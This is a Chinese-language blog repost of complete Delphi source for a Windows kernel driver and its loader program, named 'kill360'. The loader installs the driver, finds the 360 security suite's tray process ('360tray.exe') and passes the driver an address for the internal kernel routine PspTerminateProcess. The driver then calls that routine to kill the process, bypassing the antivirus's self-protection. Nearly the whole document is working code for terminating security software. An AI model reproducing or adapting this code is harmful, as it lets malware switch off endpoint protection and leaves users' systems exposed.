本文整理自网络,侵删。
原理是在ring3搜索PspTerminateProcess地址,再传到ring0,减轻ring0代码的复杂程度
驱动代码:
unit killDriver;
{$HINTS OFF}
{$WARNINGS OFF}
interface
uses
nt_status, ntoskrnl, native, winioctl, fcall, macros;
function _DriverEntry(pDriverObject: PDRIVER_OBJECT; pusRegistryPath: PUNICODE_STRING): NTSTATUS; stdcall;
implementation
type
Tsysinfo = record
MyPspaddress:dword;
PID: DWORD;
end;
Psysinfo = ^Tsysinfo;
const
DeviceName = '\Device\mybr'; ///设备名
DosDeviceName = '\??\mybr'; ///符号链接名
var
g_usDeviceName, g_usSymbolicLinkName: UNICODE_STRING;
type
TPSPTERPROC = function(Process:pvoid; ExitStatus:Cardinal): Cardinal; stdcall;
function DispatchCreateClose(p_DeviceObject: PDEVICE_OBJECT; p_Irp: PIRP): NTSTATUS; stdcall; ///对打开或关闭请求的响应 ,这里就是简单的返回一个成功
begin
p_Irp^.IoStatus.Status := STATUS_SUCCESS; ///设置状态为STATUS_SUCCESS 即成功
p_Irp^.IoStatus.Information := 0;
IofCompleteRequest(p_Irp, IO_NO_INCREMENT); ///调用IoCompleteRequest完成IRP
Result := STATUS_SUCCESS;
end;
function DispatchControl(p_DeviceObject: PDEVICE_OBJECT; p_Irp: PIRP): NTSTATUS; stdcall;
var
dwIoControlCode: DWORD;
dwInputBufferLength, dwOutBufferLength: DWORD;
status: NTSTATUS;
dwBytesReturned: DWORD;
psl: PIO_STACK_LOCATION;
IOCTL_KILL_PROCESS: DWORD;
pSystemBuffer: Pointer;
InBuffer: Psysinfo;
Process:pvoid;
MyPspTerminateProcess:TPSPTERPROC ;
begin
dwBytesReturned := 0;
psl := IoGetCurrentIrpStackLocation(p_Irp); {取IRP的stack location的指针}
dwIoControlCode := psl^.Parameters.DeviceIoControl.IoControlCode; ///取控制码
dwInputBufferLength := psl^.Parameters.DeviceIoControl.InputBufferLength; ///传入Buffer的大小
dwOutBufferLength := psl^.Parameters.DeviceIoControl.OutputBufferLength; ///传出Buffer的大小
pSystemBuffer := p_Irp^.AssociatedIrp.SystemBuffer; ///传入Buffer的指针
IOCTL_KILL_PROCESS := CTL_CODE(FILE_DEVICE_UNKNOWN, $805, METHOD_BUFFERED, FILE_READ_ACCESS + FILE_WRITE_ACCESS); ///生成我们的控制码
if dwIoControlCode = IOCTL_KILL_PROCESS then ///如果是我们的控制码
begin
InBuffer := pSystemBuffer;
DbgPrint('PID is:%d', DWORD(InBuffer^.PID));
DbgPrint('MyPspaddress is: %08X ', InBuffer^.MyPspaddress);
PsLookupProcessByProcessId(InBuffer^.PID, process);
MyPspTerminateProcess :=TPSPTERPROC(dword(InBuffer^.MyPspaddress));
MyPspTerminateProcess(process,0);
dwBytesReturned := 0; ///这里设置返回数据的大小
status := STATUS_SUCCESS;
end else
begin
status := STATUS_INVALID_DEVICE_REQUEST;
end;
p_Irp^.IoStatus.Status := status;
p_Irp^.IoStatus.Information := dwBytesReturned;
IofCompleteRequest(p_Irp, IO_NO_INCREMENT); ///完成IRP
Result := status;
end;
procedure DriverUnload(p_DriverObject: PDRIVER_OBJECT); stdcall;
begin
DbgPrint('Driver Unload!'); ///输出调试字符串
IoDeleteSymbolicLink(@g_usSymbolicLinkName); ///删除我们创建的符号链接
IoDeleteDevice(p_DriverObject^.DeviceObject); ///删除我们创建的设备
end;
///驱动入口点
function _DriverEntry(pDriverObject: PDRIVER_OBJECT; pusRegistryPath: PUNICODE_STRING): NTSTATUS;
var
status: NTSTATUS;
DeviceObject: TDeviceObject;
begin
status := STATUS_DEVICE_CONFIGURATION_ERROR;
///初始化UNICODE_STRING结构
RtlInitUnicodeString(g_usDeviceName, DeviceName);
RtlInitUnicodeString(g_usSymbolicLinkName, DosDeviceName);
///创建设备
if (IoCreateDevice(pDriverObject, 0, @g_usDeviceName,
FILE_DEVICE_UNKNOWN, 0, FALSE,
DeviceObject) = STATUS_SUCCESS) then
begin
///如果创建成功
DbgPrint('Create Device Success'); ///输出调试字符串
///创建符号链接
if (IoCreateSymbolicLink(@g_usSymbolicLinkName,
@g_usDeviceName) = STATUS_SUCCESS) then
begin
///如果创建符号链接成功执行下面的代码
DbgPrint('Create SymbolicLink Success'); ///输出调试字符串
///开始设置我们自己的分发函数
pDriverObject^.MajorFunction[IRP_MJ_CREATE] := @DispatchCreateClose; ///这里把IRP_MJ_CREATE IRP_MJ_CLOSE设置到一个函数上
pDriverObject^.MajorFunction[IRP_MJ_CLOSE] := @DispatchCreateClose;
pDriverObject^.MajorFunction[IRP_MJ_DEVICE_CONTROL] := @DispatchControl; ///对DeviceIoControl的响应,非常重要
pDriverObject^.DriverUnload := @DriverUnload; ///当驱动动态卸载时执行DriverUnload
status := STATUS_SUCCESS; ///返回STATUS_SUCCESS;
end else ///如果创建符号链接不成功
begin
DbgPrint('Create SymbolicLink Failed'); ///输出调试字符串
IoDeleteDevice(@DeviceObject); ///删除设备
end;
end;
Result := status;
end;
end.
exe部分:
program kill360;
uses
Windows,
SysUtils,
DrvMgr,
TlHelp32,
getpspterminataaddress;
//my blog: http://hi.baidu.com/9908006
const
drName = 'kill';
type
Tsysinfo = record
MyPspaddress: dword;
PID: DWORD;
end;
var
hDevice: THANDLE;
InBuffer: Tsysinfo;
dwBytesReturned: DWORD;
IOCTL_KILL_PROCESS: DWORD;
dwPID: DWORD;
drPath: string;
strProcessName: string;
function AnsiEndsText(const ASubText, AText: string): Boolean;
var
P: PChar;
L, L2: Integer;
begin
P := PChar(AText);
L := Length(ASubText);
L2 := Length(AText);
Inc(P, L2 - L);
if L > L2 then
Result := False
else
Result := CompareString(LOCALE_USER_DEFAULT, NORM_IGNORECASE, P, L, PChar(ASubText), L) = 2;
end;
function GetProcessID(ExeName: string): DWORD;
var
sphandle: DWORD; Found: Bool;
PStruct: TProcessEntry32;
begin
Result := 0;
sphandle := CreateToolhelp32Snapshot($00000002, 0);
PStruct.dwSize := Sizeof(PStruct);
Found := Process32First(sphandle, PStruct);
while Found do
begin
if AnsiEndsText(ExeName, PStruct.szExefile) then
begin
Result := PStruct.th32ProcessID; Break;
end;
Found := Process32Next(sphandle, PStruct);
end;
CloseHandle(sphandle);
end;
function IsXp03(): Boolean;
var
OSVer: TOSVersionInfo;
begin
Result := False;
OSVer.dwOSVersionInfoSize := Sizeof(TOSVersionInfo);
if GetVersionEx(OSVer) then
begin
if (OSVer.dwPlatformId = VER_PLATFORM_WIN32_NT) then
begin
if (OSVer.dwMajorVersion = 5) and ((OSVer.dwMinorVersion = 1) or (OSVer.dwMinorVersion = 2)) then result := true else
result := false;
end;
end;
end;
function CTL_CODE(DeviceType, Func, Method, Access: DWORD): DWORD;
begin
result := (((DeviceType) shl 16) or ((Access) shl 14) or ((Func) shl 2) or (Method));
end;
begin
//判断系统版本,如果不是xp或2003系统就退出
if not (IsXp03) then exitprocess(0);
//驱动文件路径,放在当前目录下
drPath := ExtractFilePath(paramstr(0)) + 'killDriver.sys';
//要杀的目标进程名
strProcessName := '360tray.exe';
//scm方式安装驱动
InstallDriver(drName, PChar(drPath));
//装入驱动
LoadDriver(drName);
dwPID := GetProcessID(strProcessName);
if dwPID <> 0 then
begin
hDevice := CreateFile('\\.\mybr', GENERIC_READ + GENERIC_WRITE, 0, nil, OPEN_EXISTING, 0, 0); ///打开符号链接
if hDevice <> INVALID_HANDLE_VALUE then
begin
InBuffer.PID := dwPID; //
InBuffer.MyPspaddress := getpspaddress;
IOCTL_KILL_PROCESS := CTL_CODE(FILE_DEVICE_UNKNOWN, $805, METHOD_BUFFERED, FILE_READ_ACCESS + FILE_WRITE_ACCESS); ///生成设备控制代码
if not(DeviceIoControl(hDevice, IOCTL_KILL_PROCESS, @InBuffer, sizeof(InBuffer), nil, 0, dwBytesReturned, nil)) then messagebox(0,pchar('通信失败!'),'mybr',0);
end else messagebox(0,pchar('未找到目录设备!'),'mybr',0);
CloseHandle(hDevice); ///关闭句柄
end;
UnloadDriver(drName);
UninstallDriver(drName);
end.
相关阅读 >>
Delphi unidac 连接mdb access 数据库
Delphi unigui中如何监听session的开始与结束
更多相关阅读请进入《Delphi》频道 >>
